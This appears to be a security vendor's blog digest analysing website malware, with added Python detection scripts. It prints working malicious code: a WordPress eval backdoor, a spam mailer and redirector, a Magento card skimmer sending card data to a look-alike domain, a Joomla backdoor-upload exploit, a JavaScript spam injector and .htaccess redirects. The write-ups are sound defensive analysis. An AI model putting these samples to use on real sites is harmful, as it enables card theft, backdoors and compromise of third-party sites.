Minimalistic WordPress injection

WordPress-specific malware is slightly different from generic PHP malware: inside WordPress files it can use the WordPress API and the WordPress database, which makes injections like this one possible:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code executes the value of the "render" option (that is what the hex-escaped string decodes to) from the WordPress wp_options table, which it reads with the get_option WordPress API function.

This piece of code can be used either as a backdoor (say, to execute arbitrary code passed in a certain request parameter) or to inject client-side malware (it was found right after the tag in theme files). We actually found the "render" option in the database, but by the time we began working on the site, that option had already been cleaned, so at this point we can't tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at labs@sucuri.net

Yet another spam mailer

Here is a mailer script we recently found that appears to be designed to send spam emails.

These kinds of scripts are pretty common; there are multiple variations, but in most cases they are only designed to send spam. Accessing the file directly without passing a specific variable makes it display a blank page, which spammers use to hide the functionality of the script.

<?php
// Health check: a request carrying ?ch=... just answers "OK", so the operator
// can confirm the script is still reachable.
if ($_GET['ch']) {
    echo "OK";
    exit();
}

// Mailer: recipient, subject, body and the raw headers all come straight from
// the POST body, so the caller fully controls the outgoing message.
if ($_POST['to']) {
    $to      = $_POST['to'];
    $subject = stripslashes($_POST['subj']);
    $message = stripslashes($_POST['mes']);
    $headers = stripslashes($_POST['headers']);

    if (mail($to, $subject, $message, $headers)) {
        echo "Message sent successfully";
    } else {
        echo "An error occured";
    }
}

// Redirector: any other GET request is bounced to a host that is encoded in
// the name of the first query parameter; the parameter's value is the path.
if (!$_POST['to'] && !$_GET['ch'] && count($_GET) > 0) {
    // 1..37 map to a-z, '.', 1-9 and 0
    $arr = array(
         1 => 'a',  2 => 'b',  3 => 'c',  4 => 'd',  5 => 'e',  6 => 'f',  7 => 'g',
         8 => 'h',  9 => 'i', 10 => 'j', 11 => 'k', 12 => 'l', 13 => 'm', 14 => 'n',
        15 => 'o', 16 => 'p', 17 => 'q', 18 => 'r', 19 => 's', 20 => 't', 21 => 'u',
        22 => 'v', 23 => 'w', 24 => 'x', 25 => 'y', 26 => 'z', 27 => '.', 28 => '1',
        29 => '2', 30 => '3', 31 => '4', 32 => '5', 33 => '6', 34 => '7', 35 => '8',
        36 => '9', 37 => '0'
    );

    $var = key($_GET);             // first parameter name, e.g. "8-5-12-12-15"
    $var_arr = explode("-", $var);
    $string = "";

    foreach ($var_arr as $value) {
        preg_match_all("~\d+~", $value, $matches);   // keep only the digits
        $value = implode("", $matches[0]);

        // values above 37 wrap around into the 1..37 range
        if ($value > sizeof($arr)) {
            for ($i = $value; $i > sizeof($arr); $i = $i - sizeof($arr)) {
                $value = $i;
            }
            $value -= sizeof($arr);
        }

        $string .= $arr[$value];
    }

    $link = $string . $_GET[$var];
    header("Location: http://{$link}");
}

If you see it on your site, you are likely compromised.
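When this mailer shows up in access logs, the redirect targets are hidden in the parameter names. The following decoder, added here and not part of the original script, reproduces the mapping and wrap-around logic above so an analyst can turn a logged query string back into the Location the script would have sent; the query strings are constructed samples.

```python
import re
from urllib.parse import parse_qsl

# Same 37-symbol table as the script's $arr: index n-1 holds $arr[n]
ALPHABET = "abcdefghijklmnopqrstuvwxyz.1234567890"

def fold(n, size=len(ALPHABET)):
    """Reproduce the script's wrap-around loop: values above 37 reduce to 1..37."""
    if n > size:
        n = (n - 1) % size + 1
    return n

def decode_redirect(query):
    """Return the Location the mailer would emit for a GET query string,
    or None when the request is a 'ch' probe rather than a redirect."""
    params = parse_qsl(query, keep_blank_values=True)
    if not params:
        return None
    if dict(params).get("ch") not in (None, "", "0"):
        return None                     # script answers "OK" instead
    key, value = params[0]              # key($_GET) and $_GET[$var]
    host = []
    for seg in key.split("-"):
        digits = "".join(re.findall(r"\d+", seg))
        if not digits:
            continue                    # $arr[''] is undefined: nothing appended
        n = fold(int(digits))
        if 1 <= n <= len(ALPHABET):
            host.append(ALPHABET[n - 1])
    return "http://" + "".join(host) + value

# Constructed query strings (not from a real incident)
SAMPLE_QUERIES = [
    "8-5-12-12-15-27-3-15-13=/landing.html",   # plain encoding of hello.com
    "45-5-12-12-15-27-3-15-13=/landing.html",  # first segment wrapped (45 -> 8)
    "ch=1",                                    # liveness probe, not a redirect
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(q, "->", decode_redirect(q))
```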

Magento script stealing credit card details

We recently found another malicious script used to steal credit cards, injected into compromised websites running Magento. It sends the stolen information to payment.authorize.ga, a recently registered domain that mimics the Authorize.net payment gateway.

The malware was found in file: ./app/code/core/Mage/Payment/Model/Method/Cc.php

// $info is assumed to be the payment info object already in scope in Cc.php.
$object = new Mage_Checkout_Block_Onepage_Billing;
$address1 = $object->getQuote()->getBillingAddress();
$data1 = $address1->getFirstname();
$data2 = $address1->getLastname();
$data3 = $address1->getStreet(1);
$data5 = $address1->getCity();
$data6 = $address1->getRegion();
$data7 = $address1->getPostcode();
$data8 = $address1->getCountry();
$data9 = $address1->getTelephone();
$data10 = $info->getCcNumber();
$expyear = substr($info->getCcExpYear(), -2);
$expmonth = $info->getCcExpMonth();
if (strlen($expmonth) == 1) {
    $expmonth = '0' . $expmonth;
}
$data11 = $expmonth;
$data12 = $expyear;
$data13 = $info->getCcCid();
$data15 = "infectedwebsite.com";
$data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
// short timeout so the checkout never visibly stalls when the drop site is down
$ctx2 = stream_context_create(array(
    'http' => array(
        'timeout' => 3
    )
));
// card number, CVV, expiry, name, address, e-mail, phone and a site tag,
// pipe-joined and sent as a query string to the look-alike domain
$tesco = "$data10|$data13|$data11$data12|$data1 $data2|$data3|$data5|$data6|$data7|$data8|$data16|$data9|$data15";
$ordser = @file_get_contents("http://payment.authorize.ga/uk.html?speciality=$tesco", -1, $ctx2);

We regularly detect malware that targets Magento payment modules.

In this case, the entire code from the $object all the way to the last line ending with $ctx2); should be removed from the Cc.php file in order to stop the credit card details from being sent to the remote website.

Other files could also contain this malicious code or even different code that will re-add the injection back in the site even after the above is removed, so just contact us if you have any questions and we will be happy to inspect the website.
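Both the eval(get_option(...)) theme injection and the Cc.php skimmer leave textual traces that a file scan can pick up. The script below is an added example, not a Sucuri tool: it walks a site root, flags both patterns and decodes the hex-escaped option name so you know which wp_options row to inspect. The two sample snippets are constructed from the code shown on this page.

```python
import os
import re

# Constructed samples (not real files) mirroring the two injections discussed above
SAMPLE_THEME = '<?php eval(get_option("\\x72\\x65\\x6e\\x64\\x65\\x72")); ?>'
SAMPLE_CC = ('$data10 = $info->getCcNumber();\n'
             '$ordser = @file_get_contents("http://payment.authorize.ga/uk.html'
             '?speciality=$tesco", -1, $ctx2);\n')

def decode_php_hex(s):
    """Turn PHP double-quoted "\\xHH" escapes back into plain characters."""
    return re.sub(r'\\x([0-9A-Fa-f]{1,2})', lambda m: chr(int(m.group(1), 16)), s)

def scan_source(source):
    """Return (indicator, detail) pairs for the two patterns described on this page."""
    findings = []
    # 1) eval() fed from the wp_options table; report the real option name
    for m in re.finditer(r'eval\s*\(\s*get_option\s*\(\s*"([^"]*)"', source):
        findings.append(("eval_get_option", decode_php_hex(m.group(1))))
    # 2) card data read from the payment info object and shipped to a remote host
    if re.search(r'->getCc(Number|Cid)\s*\(', source):
        for m in re.finditer(r'file_get_contents\s*\(\s*"https?://([^"/]+)', source):
            findings.append(("card_exfil_host", m.group(1)))
    return findings

def scan_tree(root):
    """Walk a site root and map every PHP file that has findings to them."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_source(fh.read())
            except OSError:
                continue
            if found:
                report[path] = found
    return report

if __name__ == "__main__":
    import sys
    for path, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, found)
```

The decoded option name tells you which wp_options row holds the actual payload, so check the database as well as the files.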

Hacked Sites Help Hack Third-Party Sites

Just a reminder that your hacked site may be used to anonymously hack third-party sites.

This Joomla com_Myblog exploit script was found on one hacked site:

$uploadfile = "tq.php.jpg";   // PHP backdoor carrying a .jpg extension
$ch = curl_init("http://<third-party-site.com>/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('fileToUpload' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

This code uploads a PHP backdoor disguised as a JPG file, using a vulnerability in a really old (and, it seems, no longer supported) My Blog Joomla component.

Still, some webmasters use it on Joomla 1.5.x sites, and this exploit has proven to be effective, as you can read in this blog post. That post also provides a quick fix for this vulnerable component. Apply it if you still use legacy versions of the component, but also consider upgrading your site to software that is up to date (both Joomla and third-party components, plugins and templates).

visitorTracker spam-seo injector wave corrupts sites

Recently, we're seeing an increasing visitorTracker malware wave.

Moreover, there are lots of corrupted infections out there, breaking the infected sites. Right now, the malicious code starts and ends with a visitorTracker comment tag, and many of a site's legitimate JavaScript files are injected with the malicious code as well. The outcome, in the case of a successful (not broken) infection, is spam content served to visitors using mobile devices.

Part of the malicious injection:

var visitortrackerin = setInterval(function(){
    if(document.body != null && typeof document.body != "undefined"){
        clearInterval(visitortrackerin);
        if(typeof window["globalvisitor"] == "undefined"){
            window["globalvisitor"] = 1;
            var isIE = visitortrackerde();   // browser check, defined elsewhere in the injection
            var isChrome = !isIE && !!window.chrome && window.navigator.vendor === "Google Inc.";
            if(visitorTracker_isMob()){
                // mobile visitors load the spam script with mob=1
                var visitortrackervs = document.createElement("script");
                visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php?mob=1";
                document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
            }else{
                if((isIE && !isChrome && !visitorTracker_isMob())){
                    var visitortrackervs = document.createElement("script");
                    visitortrackervs.src = "http://test.com/components/com_banners/models/main_configuration/watch.php";
                    document.getElementsByTagName("head")[0].appendChild(visitortrackervs);
                }
            }
        }
        visitortracksdel();   // cleanup helper, also defined elsewhere in the injection
    }
    // remainder of the setInterval call and its helpers are not shown in this excerpt

As mentioned, the infection is very buggy and often removes single quotes from legitimate files, which corrupts the site completely. It affects plugins, themes and even core files of WordPress and Joomla. The solution is to restore the files from a clean backup.

Secondtds.mooo[.]com .htaccess redirects

We are finding many sites infected with malicious redirects inside the .htaccess file, pointing to secondtds.mooo[.]com/go.php?sid=3. That domain is a TDS (traffic direction system) which redirects visitors to another website that pushes the browser to download this malware: https://www.virustotal.com/en/file/0b6eab15961f92da95a0a4b0d55fee8a8bd0eb39fec1027aa43575802d7a199e/analysis/1441223870/

The redirect chain is:

secondtds.mooo[.]com
downserver.ignorelist[.]com
pastdownload[.]com
stds1new.computersoftwarelive[.]com
download.pastdownload[.]com
files.september-master-3[.]xyz

Here is the .htaccess content:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} go.mail.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*nigma.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
..
RewriteCond %{HTTP_REFERER} .*aport.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://secondtds.mooo[.]com/go.php?sid=2 [R=301,L]

The attack is quite buggy and doesn't check whether a site is already infected, which is why you often find multiple identical redirect rules in the same .htaccess file.
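The two traits described above, an off-site RewriteRule gated on search-engine referrers and the same rule appearing more than once, are easy to check for mechanically. This is an added example, not a Sucuri tool, and the .htaccess excerpt it runs on is constructed, with a placeholder host (tds.example.net) standing in for the TDS domain.

```python
import re
from collections import Counter

# Constructed .htaccess excerpt (not from a real site): the rule was injected twice,
# followed by an ordinary front-controller rule that must not be flagged.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://tds.example.net/go.php?sid=2 [R=301,L]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://tds.example.net/go.php?sid=2 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

def find_referer_redirects(text, own_hosts=()):
    """Return RewriteRules that send traffic to another host and are gated on
    HTTP_REFERER conditions. own_hosts lists hosts the site legitimately uses."""
    conds, hits = [], []
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        if parts[0] == "RewriteCond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))        # (test string, pattern)
        elif parts[0] == "RewriteRule" and len(parts) >= 3:
            m = re.match(r"https?://([^/\s]+)", parts[2])
            referers = [p for ts, p in conds if ts == "%{HTTP_REFERER}"]
            if m and m.group(1) not in own_hosts and referers:
                hits.append({"target": parts[2], "host": m.group(1), "referers": referers})
            conds = []                                 # conditions bind to this rule only
    return hits

def duplicated_rules(text):
    """Identical RewriteRule lines repeated in one file, the re-infection tell above."""
    counts = Counter(l.strip() for l in text.splitlines()
                     if l.strip().startswith("RewriteRule"))
    return {rule: n for rule, n in counts.items() if n > 1}

if __name__ == "__main__":
    for h in find_referer_redirects(SAMPLE_HTACCESS):
        print("off-site redirect to", h["host"], "when referer matches", h["referers"])
    print(duplicated_rules(SAMPLE_HTACCESS))
```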

If you find this code, remove it right away!

GCCanada.com Malware

We are seeing a large number of sites with a malicious script from gccanada.com injected into them. The malware redirects visitors to searchmagnified.com, which redirects them to freeresultsguide.com. This is the code being added to the hacked sites:

<script type='text/javascript' src="http://gccanada[.]com/jquery[.]js"></script>

What is so bad about it? The final domain, 'freeresultsguide.com', pushes you to buy fake antivirus software with some annoying messages and warnings:

Important security message. Please call the number provided asap to get your computer fixed. You have a virus!

If you see this gccanada code on your site, it means you got hacked. It is not from the Government of Canada, as they want you to think.